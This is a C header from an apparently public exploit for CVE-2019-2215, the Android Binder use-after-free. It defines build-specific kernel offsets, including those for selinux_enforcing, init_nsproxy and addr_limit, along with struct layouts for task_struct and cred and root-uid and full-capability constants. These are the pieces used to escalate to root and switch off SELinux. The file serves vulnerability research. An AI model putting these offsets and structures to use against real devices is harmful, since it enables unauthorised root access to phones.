/*++

   ## # # ###     ### ###  #  ###     ### ###  #  ###
  #   # # #         # # # ##  # #       #   # ##  #
  #   # # ##  ### ### # #  #  ### ### ### ###  #  ###
  #   # # #       #   # #  #    #     #   #    #    #
   ##  #  ###     ### ### ### ###     ### ### ### ###
                                         @HackSysTeam

                    CVE-2019-2215
            Android Binder Use after Free
            CloudFuzz TechnoLabs Pvt. Ltd.

 https://groups.google.com/d/msg/syzkaller-bugs/QyXdgUhAF50/g-FXVo1OAwAJ
 https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
 https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html

 Thanks:
    @maddiestone
    @tehjh

--*/

#pragma once

#ifndef __COMMON_H__
#define __COMMON_H__

#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>


/**
 * Defines
 */

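/*
 * BANNER: the ASCII-art header printed at start-up. It is a single string
 * literal built from adjacent pieces, so it can be passed straight to
 * INFO("%s", BANNER) or fputs().
 */
#define BANNER \
        "                                                     \n" \
        "  ## # # ###     ### ###  #  ###     ### ###  #  ### \n" \
        " #   # # #         # # # ##  # #       #   # ##  #   \n" \
        " #   # # ##  ### ### # #  #  ### ### ### ###  #  ### \n" \
        " #   # # #       #   # #  #    #     #   #    #    # \n" \
        "  ##  #  ###     ### ### ### ###     ### ### ### ### \n" \
        "                                        @HackSysTeam \n" \
        "                                                     \n"

/*
 * INFO: progress output, written to stdout. Both macros forward their
 * arguments verbatim to a printf-family function, so the first argument
 * must always be a string literal format; never pass data read from a
 * file, the kernel or the user as the format itself.
 */
#define INFO(...) printf(__VA_ARGS__)

/*
 * ERR: error output. Goes to stderr rather than stdout so that it is not
 * lost in a full-buffered stdout when the process (or the machine) dies
 * mid-run, and so that it is not interleaved with INFO text when stdout is
 * redirected. Evaluates to the byte count written, like printf.
 */
#define ERR(...) fprintf(stderr, __VA_ARGS__)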


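/*
 * Byte offset of addr_limit inside the target build's struct task_struct.
 * It is not a named member of the task_struct mirror below (0xA18 falls
 * inside its junk4 region), so it is carried separately here. Like every
 * offset in this file it is specific to one kernel build.
 */
#define OFFSET_TASK_STRUCT_ADDR_LIMIT 0xA18

/*
 * Values written into a struct cred: identity 0 for every uid/gid field,
 * default securebits, and the two capability extremes. Each expansion is
 * fully parenthesised (CERT PRE02-C) so the cast is kept together in any
 * context, including `sizeof MACRO` and unary operators. CAP_FULL_SET has
 * the low 38 bits set, i.e. capabilities 0..37; presumably CAP_LAST_CAP is
 * 37 on the target kernel - confirm against its include/uapi/linux/capability.h.
 */
#define GLOBAL_ROOT_UID     ((uint32_t)0)
#define GLOBAL_ROOT_GID     ((uint32_t)0)
#define SECUREBITS_DEFAULT  ((uint32_t)0x00000000)
#define CAP_EMPTY_SET       ((uint64_t)0)
#define CAP_FULL_SET        ((uint64_t)0x3FFFFFFFFF)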


/**
 * System.map
 *
 * ffffffff80200000 T _stext
 * ffffffff816acfe8 B selinux_enforcing
 * ffffffff81433ac0 D init_nsproxy
 */

//
// offset = 0xffffffff81433ac0 - 0xffffffff80200000
//

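/*
 * Distance from _stext to init_nsproxy on the target build, i.e.
 * 0xffffffff81433ac0 - 0xffffffff80200000 from the System.map excerpt
 * above. Fully parenthesised (CERT PRE02-C) so the ptrdiff_t cast stays
 * attached to the constant in every expression.
 */
#define SYMBOL_OFFSET_init_nsproxy      ((ptrdiff_t)0x1233ac0)

/*
 * Distance from _stext to selinux_enforcing, 0xffffffff816acfe8 -
 * 0xffffffff80200000 for the System.map above. This one has been observed
 * to move from build to build: if patching selinux_enforcing fails, this
 * constant is the first thing to re-derive from the target's System.map.
 */
#define SYMBOL_OFFSET_selinux_enforcing ((ptrdiff_t)0x14acfe8)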


/**
 * Data structures
 */

/*
 * Partial, byte-level mirror of the kernel's struct binder_thread as laid
 * out on the target build. Only `wait` is named; the junkN arrays are
 * opaque padding sized so that `wait` lands at 0xa0. Member sizes sum to
 * 0x198, the size in the trailing comment, and the struct is packed so the
 * compiler cannot insert padding of its own. The offsets are specific to
 * this kernel build (see the System.map excerpt above) and must be
 * re-derived for any other.
 */
struct binder_thread {
    uint8_t junk1[160];         /*    0    0xa0 */
    uint8_t wait[24];           /* 0xa0    0x18  presumably wait_queue_head_t, kept as raw bytes - confirm */
    uint8_t junk2[224];         /* 0xb8    0xe0 */
} __attribute__((packed));      /* size:  0x198 */


/*
 * Partial, byte-level mirror of the kernel's struct task_struct for the
 * target build. Only pid, cred and nsproxy are named; the junkN arrays are
 * opaque padding sized so each named member lands at the offset in its
 * trailing comment (members sum to 0xe60, the size noted below). Packed so
 * the compiler cannot add padding. cred and nsproxy are 8-byte integers,
 * presumably the kernel's `struct cred *` and `struct nsproxy *` pointers,
 * so the layout only makes sense on a 64-bit target. addr_limit is not a
 * member here; its offset (0xA18, inside junk4) is carried separately by
 * OFFSET_TASK_STRUCT_ADDR_LIMIT. All offsets are build-specific.
 */
struct task_struct {
    uint8_t junk1[1256];        /*     0  0x4e8 */
    pid_t pid;                  /* 0x4e8    0x4 */
    uint8_t junk2[412];         /* 0x4ec  0x19c */
    uint64_t cred;              /* 0x688    0x8  kernel address, stored as an integer */
    uint8_t junk3[48];          /* 0x690   0x30 */
    uint64_t nsproxy;           /* 0x6c0    0x8  kernel address, stored as an integer */
    uint8_t junk4[1944];        /* 0x6c8  0x798 */
} __attribute__((packed));      /* size:  0xe60 */


/*
 * Byte-level mirror of the kernel's struct cred for the target build, laid
 * out field by field through the LSM security pointer; the junk arrays
 * stand in for members this file does not name. Member sizes sum to 0xa8,
 * the size in the trailing comment, and the struct is packed so the
 * offsets hold exactly. `security` is an 8-byte pointer, so the layout
 * assumes an LP64 target. Field meanings follow the kernel names:
 * presumably `usage` is the reference count and `security` the LSM
 * (SELinux) blob - confirm against the target kernel's include/linux/cred.h.
 * Offsets are build-specific and must be re-derived for any other kernel.
 */
struct cred {
    int32_t usage;              /*    0    0x4 */
    uint32_t uid;               /*  0x4    0x4  real uid */
    uint32_t gid;               /*  0x8    0x4  real gid */
    uint32_t suid;              /*  0xc    0x4  saved uid */
    uint32_t sgid;              /* 0x10    0x4  saved gid */
    uint32_t euid;              /* 0x14    0x4  effective uid */
    uint32_t egid;              /* 0x18    0x4  effective gid */
    uint32_t fsuid;             /* 0x1c    0x4  filesystem uid */
    uint32_t fsgid;             /* 0x20    0x4  filesystem gid */
    uint32_t securebits;        /* 0x24    0x4 */
    uint64_t cap_inheritable;   /* 0x28    0x8  capability bitmasks: one bit per capability */
    uint64_t cap_permitted;     /* 0x30    0x8 */
    uint64_t cap_effective;     /* 0x38    0x8 */
    uint64_t cap_bset;          /* 0x40    0x8 */
    uint64_t cap_ambient;       /* 0x48    0x8 */
    uint8_t junk2[40];          /* 0x50   0x28  unnamed members between cap_ambient and security */
    void *security;             /* 0x78    0x8 */
    uint8_t junk3[40];          /* 0x80   0x28  trailing members, unnamed */
} __attribute__((packed));      /* size:  0xA8 */

#endif //__COMMON_H__
